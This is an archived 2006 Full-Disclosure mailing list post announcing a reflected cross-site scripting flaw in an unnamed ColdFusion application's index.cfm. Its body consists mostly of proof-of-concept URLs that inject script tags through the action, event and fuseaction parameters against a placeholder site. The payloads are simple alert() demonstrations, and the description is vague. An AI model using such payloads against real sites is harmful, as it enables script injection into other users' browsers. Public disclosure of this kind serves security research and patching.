[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] New Ploblem in Index.cfm

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] New Ploblem in Index.cfm
From: saied hackeriran <saiedhackeriran@xxxxxxxxx>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)

           In The Name Of God

Discoverer:SaiedHacker
Group:HackeranShiraz
Critical Level : Dangerous


This matter happens in index.cfm when
We want to run some specific Functions
Such as action,event,.... and hacker 
Can start attacks such as XSS attack by
Using simple script or HtML code.


Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>

Xss:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>

Have fun
SaiedHackerIran@xxxxxxxxx
www.SaiedHackerPro.PersianBlog.com



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] New Ploblem in Index.cfm
  - From: Valdis . Kletnieks

Prev by Date: Re: [Full-disclosure] DELL Hardware KeyLogger??
Next by Date: Re: [Full-disclosure] DELL Hardware KeyLogger??
Previous by thread: Re: [Full-disclosure] DELL Hardware KeyLogger??
Next by thread: Re: [Full-disclosure] New Ploblem in Index.cfm
Index(es):
- Date
- Thread